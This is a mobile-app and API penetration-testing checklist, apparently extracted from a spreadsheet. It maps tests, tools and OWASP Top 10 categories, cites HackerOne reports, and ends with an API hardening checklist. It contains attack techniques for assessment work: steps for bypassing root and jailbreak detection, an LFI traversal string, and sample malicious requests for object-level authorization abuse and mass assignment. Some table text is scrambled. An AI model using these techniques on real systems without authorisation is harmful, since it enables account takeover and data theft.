M8. Code Tampering Test Name Result

M8-01 Unauthorized Code Modification Issue
M8-02 Runtime Manipulation Issue
M8-03 Rooted or Jail-broken device checking Issue

M9. Reverse Engineering Test Name Result

M9-01 Reverse Engineering the Application Code (Code Obfuscating Checking) Issue
M9-02 Information leakage/Hardcoded credential in the binaries Issue

M10. Extraneous Functionality Test Name Result

M10-01 Debuggable Application Issue
M10-02 Passwords/ Connection String disclosure Issue
M10-03 Hidden and Unscrutinised functionalities Issue
MobileApp_PT
Checklist
Penetration testing checklist based on OWASP Top 10 Mobile 2016

Applicable
Test Name Description Tool Platform OWASP Result
apktool,
dex2jar,
Reverse Engineering the Application Code Clutch,
(Code Obfuscating Checking) Disassembling and Decompiling the application Classdump All M9 Issue
Information leakage/Hardcoded credential Identify sensitive information through binary/source string, jdgui,
in the binaries code IDA, Hopper All M9 Issue
Static code modification, Binary patching, Bypass apktool,
Unauthorized Code Modification check sum mechanism Hopper All M8 Issue
apktool,
Misuse of App permissions Identify excessive App permissions MobSF Android M1 Issue
Identify "minSdkVersion" on apktool.yml, the value be
Insecure version of OS Installation Allowed set over than 17. For iOS, identify minOS using idb. apktool, idb All M1 Issue
MobSF

Abusing Android Components through IPC Androidmanife

intents ("exported" and "intent-filter") Identify android exported components st.xml Android M1 Issue
apktool

Check "android:allowBackup" attribute which should Androidmanife

Unrestricted Backup file be set to "false" st.xml Android M2 Issue
jdgui, MobSF,
Identify insecure/deprecated cryptographic algorithms Qark, Hopper,
Cryptographic Based Storage Strength (RC4, MD5, SHA1) on sourcecode iFunbox All M5 Issue
jdgui, MobSF,
Identify hardcoded key in application or Keys may be Qark, Hopper,
Poor key management process intercepted via Binary attacks iFunbox All M5 Issue
jdgui, MobSF,
Qark, Hopper,
Static Use of custom encryption protocols Identify implementing their own protocol iFunbox All M5 Issue
analysis Debuggable Application Identify "android:debuggable" attribute adb, MobSF Android M10 Issue

Applicable
Test Name Description Tool Platform OWASP Result
Identify misuse of Data protection API on Keychain,
Misuse of Keychain , Touch ID and other Misuse of TouchID (Retrieve credentials from Local
security related controls Storage, Local Authen) iDevice iOS M1 Issue
Minimum Device Security Requirements Ensure that app cannot execute when the PIN or
absent Pattern lock is not enabled. Device All M1 Issue
adb, idb,
Unencrypted Database files Check encryption on database files iFunbox All M2 Issue
Identify Sensitive Data on Shared Storage, SD card
storage encryption, Shared preferences
Insecure Shared Storage MODE_WORLD_READABLE adb Android M2 Issue
adb, idb,
iFunbox,
Identify Sensitive Data in application files (application BinaryCookie
Insecure Application Data Storage log, Cache file, Cookie) Reader All M2 Issue
adb logcat,
idb,
Information Disclosure through libimobiledevic
Logcat/Apple System Log (ASL) Identify sensitive information through application log e All M2 Issue
Identify application snapshot/screenshot Device,
Application Backgrounding (Screenshot) backgrounding iFunbox All M2 Issue
Identify disabling Copy/Paste function for sensitive
Copy/Paste Buffer Caching part of the application on EditText/UITextField idb, iFunbox All M2 Issue
Identify keyboard cache file located in:
/var/mobile/Library/Keyboard
/data/data/com.android.providers. Device, idb,
Keyboard Press Caching userdictionary/databases/user_dict.db iFunbox All M2 Issue
For Android, Check "android:allowBackup" attribute apktool,
which should be set to "false" iPhone
For iOS, Use iTune to backup application folder in Backup
Unrestricted Backup file order to check sensitive info from backup folder Extractor All M2 Issue
Remember Credentials Functionality adb, idb,
(Persistent authentication) Identify user's password or sessions on the device iFunbox All M4 Issue
adb, Drozer,
Cycript,
Perform binary attacks against the mobile app in Snoop-it,
Client Side Based Authentication Flaws order to bypass offline authentication Burpsuite All M4 Issue
adb, Drozer,
Perform binary attacks against the mobile app and try Cycript,
to execute privileged functionality that should only be Snoop-it,
Client Side Authorization Breaches executable with a user of higher privilege Burpsuite All M6 Issue
Content Providers: SQL Injection and
Local File Inclusion Identify SQLi and LFI on Content provider component Drozer Android M7 Issue
Identify intent-filter on broadcast and receiver
component in order to directly access and sniff the
Broadcast Receiver information Drozer Android M7 Issue
Service component Invoke Service component directly Drozer Android M7 Issue
 Identify misconfiguration on "android.webkit.
WebSettings"
(Javascript/File access/Plugins), XSS through
Insufficient WebView hardening UIWebview jdgui, iDevice All M7 Issue
adb, iDevice,
Injection (SQLite Injection, XML Injection) Identify SQLi and XMLi on application Burpsuite All M7 Issue
Check LFI on application(../ , ../../blah\0) Webviews
Local File Inclusion through Webviews FileAccess attack through setAllowFileAccess jdgui, iDevice All M7 Issue
For iOS: Identify URL schemes through info.plist and
Clutch+Strings to obtain URL scheme structures
For Android: Identify URL schemes through source apktool, jdgui,
Abusing URL schemes or Deeplinks code or manifest file Clutch, Strings All M7 Issue
Identify sensitive information masking (Creditcard no. Device,
Sensitive Information Masking on UI and HTTPs traffic) Burpsuite All M7 Issue
Frida, Cycript,
Runtime Manipulation Run-time manipulation, Method swizzling Snoop-it All M8 Issue
Detect root/jb detection code in the reverse
engineered app file.If found, delete/ change the
access control of the file containing the code and
restart the app. Or Install tools like hidemyroot and tsProtector,
Rooted or Jail-broken device checking run the apps RootCloak2 All M8 Issue
Identify sensitive information (Credential) between jdgui,
Dynamic and Passwords/ Connection String disclosure mobile and API Burpsuite All M10 Issue
Runtime Identify extraneous functionality (Hidden back-end jdgui,
analysis Hidden and Unscrutinised functionalities URL) Burpsuite All M10 Issue

Applicable
Test Name Description Tool Platform OWASP Result
Observe the device's network traffic through a proxy
Insecure Transport Layer Protocols that SSL is implemented or not Burpsuite All M3 Issue
testssl.sh,
Use of Insecure and Deprecated Qualys SSL
algorithms Identify SSL/TLS Encryption Algorithms Labs All M3 Issue
Allow tester to intercept SSL traffic without Certificate jdgui, MobSF,
Use of Disabling certificate validation installation (checkServerTrusted with nobody) Qark All M3 Issue
Check whether application accepts a certificate from
any trusted CA (Burpsuite) or not. E.g. Check
setAllowsAnyHTTPSCertificate(iOS) and jdgui, MobSF,
Communicati SSL pinning Implementation AllowAllHostnameVerifier(Android) Qark All M3 Issue
on Channel End-to-end encryption Identify end-to-end encryption on application layer Burpsuite All M3 Issue

Applicable
Test Name Description Tool Platform OWASP Result
Excessive port opened at Firewall Identify opened port at Server-side URL/IP Address Nmap All M1 Issue
Identify default credentials on Backend server (e.g.
Tomcat Application server using tomcat/tomcat,
Default credentials on Application Server admin/tomcat) Web Browser All M1 Issue
Identify weak password policy implementation both
mobile and server side (e.g. Bypass password
Weak password policy Implementation complexity checking on UI) Burpsuite All M1 Issue
Exposure of Webservices through WSDL Identify webservices help pages (*.asmx) which show
document methods and structure Web Browser All M1 Issue
Identify webserver configuration (e.g. Error handling, Web Browser,
Security Misconfiguration on Server API HTTP response banner) Burpsuite All M1 Issue
Security Patching on Server API Identify vulnerability on server API Nessus All M1 Issue
Check input validation (e.g. SQL Injection, XXE) on
Input validation on API API/Webservices Burpsuite All M1 Issue
Information Exposure through API Identify sensitive information on API response
response message message/header Burpsuite All M1 Issue
Control of interaction frequency on API Conduct simultaneous attack on API (e.g. OTP, email Burpsuite
(Replay Attack) sending) (Intruder) All M1 Issue
Ensure that all session invalidation events are
executed on the server side and not just on the
Session invalidation on Backend mobile app Burpsuite All M4 Issue
Mobile app must have adequate timeout protection
Session Timeout Protection on the backend components Burpsuite All M4 Issue
Ensure that reset cookies is properly implemented
during authentication state changes
Cookie Rotation (Anonymous<->User, User A<->User B, Timeout) Burpsuite All M4 Issue
Simultaneously login from multiple device with the
Multiple concurrent logins same credential Burpsuite All M4 Issue
Observe the device's network traffic through a proxy
Exposing Device Specific Identifiers in that Device's information (UDID) is sent during the
Attacker Visible Elements transmission or not. Burpsuite All M4 Issue
They should be standard algorithm, sufficiently long,
complex, and pseudo-random so as to be resistant to
Token/Session Creation and handling guessing/anticipation attacks. Burpsuite All M5 Issue
Directly access unauthorised object/var through
Insecure Direct Object references HTTPs traffic Burpsuite All M6 Issue
Directly access unauthorised function through HTTPs
Server Side - Missing function level access control traffic Burpsuite All M6 Issue
Webservices Bypass business logic data validation, Circumvention
and API Bypassing business logic flaws of Work Flows Burpsuite All M6 Issue
S NO OWASP Top 10 API Approach Hackerone reports for reference

- User Id 718492 rating his ride, Intercept the request, Change the id to 718493
in the database it will update like user 718493 is rating his ride
- Based on Userid & Object id
Profile controller - User #585 has access to update profile #616
POST /update_profile
{"user_id":616, "email":"[email protected]"}

Receipts Controller - User #232 has access to view receipt #777

Get /receipts/777

Admin Panel Controller - Admin #616 has access to delete user #888
A1 - BOLA (Broken Object Level DELETE /admin/delete_user?user_id=888 Uber full account takover by Anand prakash
1 Authorization) (appsecure)

Detection areas: Forgetpassword, weblogin, get_location, update_picture

rate limiting
Facebook - full account takeover - Anand
Misconfiguration: JWT allows, tokens dont expire etc Prakash
reset password token 5digit value -
2 A2 - Broken User Authentication Extra protection: Account lockout, captcha, bruteforce attacks predictable

Apis Expose sensitive data (PII) of other users by design

GET /allusersinfo
3 A3 - Excessive Data exposure GET /match_users?from=0 3fun app - by Alex lomas (pentestpartners)

Might lead to dos

A4 - Lack of resources & rate limit the requests value
4 limiting Rate limiting absent https://hackerone.com/reports/170310

Admin, riders, Drivers

privilege escalation - Horizontal & vertical

eg: if a rider can able to delete admin ID

@uzsunny reported that by creating two
Easiest way to detect - partner accounts sharing the
1) Fetch users profile same business email, it was possible to be
Get /app/users_view.aspx?user_id=1337 granted "collaborator" access to anystore
without any merchant interaction in shopify
2) Delete user by admin function application
A5 - Broken Function level POST app/admin_panel/users_mgmt.aspx The code did not properly check What type
5 Authorization (BFLA) action=delete&user_id=1337 the existing account was

Create user - traditional flow

1) Legitimate request:
Post /api/users/new https://hackerone.com/reports/9942
{"username":"Inon", "pass":"123456"} Users can enable API Access for free via mass
Assignment
2) Malicious Found by Jameskettle (portswigger) in new
Post /api/users/new relic program
{"username":"Inon", "pass":"123456", "role"="admin"}
POST /accounts/<account_id>.json
Easier to exploit in APis
Always try with GET, POST, PUT & PATCH account [firstname]="evil" &
6 A6 -Mass Assignment User Mass assignment to bypass other Security Controls account[allow_api_access]=true

Hardcoded Passwords
lack of csrf/cors protection
lack of security http headers
unnecessary exposed http methods
weak encryption
7 A7 - Security Misconfiguration etc https://hackerone.com/reports/426165

8 A8 - Injection SQL, NoSQL, BlindSQL, commandinjection etc https://hackerone.com/reports/768195

Api endpoints with no documentation

Legitimate endpoints
/v1/get_user/
/v2/update_location

Non-legitimate
/v0/b2b_old/export_all_users

finding unknown api hosts

payment-api.acme.com https://apisecurity.
mobile-api.acme.com io/encyclopedia/content/owasp/api9-
9 A9 - Improper Asset Management qa-3-old.acme.com - nonlegitimate improper-assets-management.htm

A10 - Insufficient Logging &

10 Monitoring - same as owaspweb2017
 ✓ Task
Authentication
Don't use Basic Auth. Use standard authentication instead (e.g. JWT, OAuth).
FALSE
Don't reinvent the wheel in Authentication, token generation, password storage. Use the standards.
FALSE
Use Max Retry and jail features in Login.
FALSE
JWT (JSON Web Token)

Use a random complicated key (JWT Secret) to make brute forcing the token very hard.
FALSE
Don't extract the algorithm from the header. Force the algorithm in the backend (HS256 or RS256).
FALSE
FALSE Make token expiration (TTL, RTTL) as short as possible.
Don't store sensitive data in the JWT payload, it can be decoded easily.
FALSE
OAuth
Always validate redirect_uri server-side to allow only whitelisted URLs.
FALSE
Always try to exchange for code and not tokens (don't allow response_type=token).
FALSE
Use state parameter with a random hash to prevent CSRF on the OAuth authentication process.
FALSE
Define the default scope, and validate scope parameters for each application.
FALSE
Access
FALSE Limit requests (Throttling) to avoid DDoS / brute-force attacks.
FALSE Use HTTPS on server side to avoid MITM (Man in the Middle Attack).
FALSE Use HSTS header with SSL to avoid SSL Strip attack.
Input
Use the proper HTTP method according to the operation: GET (read), POST (create), PUT/PATCH
(replace/update), and DELETE (to delete a record), and respond with 405 Method Not Allowed if the
FALSE requested method isn't appropriate for the requested resource.
Validate content-type on request Accept header (Content Negotiation) to allow only your supported
format (e.g. application/xml, application/json, etc.) and respond with 406 Not Acceptable response if not
FALSE matched.
Validate content-type of posted data as you accept (e.g. application/x-www-form-urlencoded,
FALSE multipart/form-data, application/json, etc.).
Validate user input to avoid common vulnerabilities (e.g. XSS, SQL-Injection, Remote Code Execution,
FALSE etc.).
Don't use any sensitive data (credentials, Passwords, security tokens, or API keys) in the URL, but use
FALSE standard Authorization header.
Use an API Gateway service to enable caching, Rate Limit policies (e.g. Quota, Spike Arrest, or Concurrent
FALSE Rate Limit) and deploy APIs resources dynamically.
Processing
FALSE Check if all the endpoints are protected behind authentication to avoid broken authentication process.
FALSE User own resource ID should be avoided. Use /me/orders instead of /user/654321/orders.
FALSE Don't auto-increment IDs. Use UUID instead.
If you are parsing XML files, make sure entity parsing is not enabled to avoid XXE (XML external entity
FALSE attack).
If you are parsing XML files, make sure entity expansion is not enabled to avoid Billion Laughs/XML bomb
FALSE via exponential entity expansion attack.
FALSE Use a CDN for file uploads.
 If you are dealing with huge amount of data, use Workers and Queues to process as much as possible in
background and return response fast to avoid HTTP Blocking.
FALSE
Do not forget to turn the DEBUG mode OFF.
FALSE
Output
FALSE Send X-Content-Type-Options: nosniff header.
Send X-Frame-Options: deny header.
FALSE
FALSE Send Content-Security-Policy: default-src 'none' header.
FALSE Remove fingerprinting headers - X-Powered-By, Server, X-AspNet-Version, etc.
Force content-type for your response. If you return application/json, then your content-type response is
FALSE application/json.
FALSE Don't return sensitive data like credentials, Passwords, or security tokens.
Return the proper status code according to the operation completed. (e.g. 200 OK, 400 Bad Request, 401
FALSE Unauthorized, 405 Method Not Allowed, etc.).
CI & CD
FALSE Audit your design and implementation with unit/integration tests coverage.
FALSE Use a code review process and disregard self-approval.
Ensure that all components of your services are statically scanned by AV software before pushing to
FALSE production, including vendor libraries and other dependencies.
Design a rollback solution for deployments.
FALSE
https://github.com/shieldfy/API-Security-Checklist
[API Pentest Guide]
API hacking by Katie Paxton-Fear
https://youtu.be/qqmyAxfGV9c
https://www.youtube.com/watch?v=cWSu2Ja65Z4
https://www.youtube.com/watch?v=yCUQBc2rY9Y&list=PLbyncTkpno5HqX1h2MnV6Qt4wvTb8Mpol

HACKTIVITY
https://www.youtube.com/watch?v=zW8QF3x3oSU
https://www.youtube.com/watch?v=HXci0-NSwOs
API 101 - https://www.youtube.com/watch?v=ijalD2NkRFg
BADAPI - https://www.youtube.com/watch?v=UT7-ZVawdzA

Part1: Introduction | Enumeration | tools

https://www.youtube.com/watch?v=UD6n666nS8I
https://virgool.io/class313/%D9%85%D9%82%D8%AF%D9%85%D9%87-%D8%A7%DB%8C-%D8%A8%D8%B1-%D8%AA%
D8%B3%D8%AA-%D9%86%D9%81%D9%88%D8%B0-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-
os12uh6bbyy4

Part2: XXE | XPath Injection | APi sql injection

https://www.youtube.com/watch?v=AIBC0WRf38A
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%
D8%A7%DB%8C-xxexpath-injectionapi-sql-injection-nfudsdnvjlv4

Part3: Xml bomb | command Injection | XST| SSRF

https://www.youtube.com/watch?v=vKm_WHxczow&feature=youtu.be
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%
D8%A7%DB%8C-xml-bombcommand-injection-xst-ssrf-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%
DB%8C%D8%B3-%D9%87%D8%A7-htnh2lninb8c

Part4: CORS | SOME | JWT | IDOR

https://www.youtube.com/watch?v=NbJwjnoJr5g&feature=youtu.be
https://virgool.io/class313/%D8%A2%D8%B3%DB%8C%D8%A8-%D9%BE%D8%B0%DB%8C%D8%B1%DB%8C-%D9%87%
D8%A7%DB%8C-corssomejwtidor-%D8%AF%D8%B1-%D9%88%D8%A8%D8%B3%D8%B1%D9%88%DB%8C%D8%B3-%
D9%87%D8%A7-xwm2fkivu3so